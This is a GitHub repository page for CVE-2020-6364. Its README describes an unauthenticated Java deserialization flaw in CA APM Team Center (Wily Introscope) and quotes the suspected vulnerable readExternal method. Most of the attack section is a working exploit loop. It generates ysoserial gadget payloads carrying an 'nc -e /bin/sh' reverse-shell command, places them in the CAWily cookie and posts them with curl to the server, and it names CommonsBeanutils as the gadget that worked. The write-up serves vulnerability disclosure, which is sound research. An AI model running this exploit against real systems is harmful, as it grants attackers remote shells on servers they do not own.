Nothing Special   »   [go: up one dir, main page]
Skip to content
/ CVE-2020-6364 Public

Remote code execution in CA APM Team Center (Wily Introscope)

2 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

gquere/CVE-2020-6364

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 
cookie.png
cookie.png
 
 

Repository files navigation

CVE-2020-6364

Remote code execution in CA APM Team Center (Wily Introscope).

Original advisory

A deserialization vulnerability in CA APM Team Center leads to unauthenticated remote code execution on the server.

When authenticating to the server a cookie is returned that starts with the infamous rO0 string indicating a base64-encoded serialized object:

Although I haven't fully traced the problem statically, this probably is the vulnerable code:

public class HttpRequestHeaderInfo implements Externalizable {
  public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {

    in.readInt();
    int numMapEntries = in.readInt();
    this.fRequestParameterMap = (numMapEntries == 0) ? Collections.EMPTY_MAP : new HashMap(numMapEntries);

    for (int i = 0; i < numMapEntries; i++) {
      this.fRequestParameterMap.put(in.readUTF(), in.readObject());
    }

    int numCookies = in.readInt();
    this.fCookies = (numCookies == 0) ? kNoCookies : new Cookie[numCookies];

    for (int j = 0; j < this.fCookies.length; j++) {
      this.fCookies[j] = new Cookie((String)in.readObject(), (String)in.readObject());
    }
  }
}

Notice that the parameter map and the cookie are deserialized using readObject() from the user input.

This is trivially exploited by identifying a suitable gadget in a for loop:

for gadget in AspectJWeaver BeanShell1 C3P0 Click1 Clojure CommonsBeanutils1 CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 CommonsCollections7 FileUpload1 Groovy1 Hibernate1 Hibernate2 JBossInterceptors1 JRMPClient JRMPListener JSON1 JavassistWeld1 Jdk7u21 Jython1 MozillaRhino1 MozillaRhino2 Myfaces1 Myfaces2 ROME Spring1 Spring2 URLDNS Vaadin1 Wicket1
do
    java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar $gadget "nc -e /bin/sh ..." | base64 -w0 > cookie
    payload=$(cat cookie)
    curl -s -k 'https://remoteserver/' -X POST -H "Cookie: CAWily=$payload"
done

The only payload that produced remote code execution for me was CommonsBeanutils. The embedded JAR is org.apache.commons_beanutils_1.9.2.1.jar and does indeed include a vulnerable gadget according to the maven repository.

Thanks

Obligatory thanks to a special someone who had me double check the header.

About

Remote code execution in CA APM Team Center (Wily Introscope)

Topics

deserialization rce introscope

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published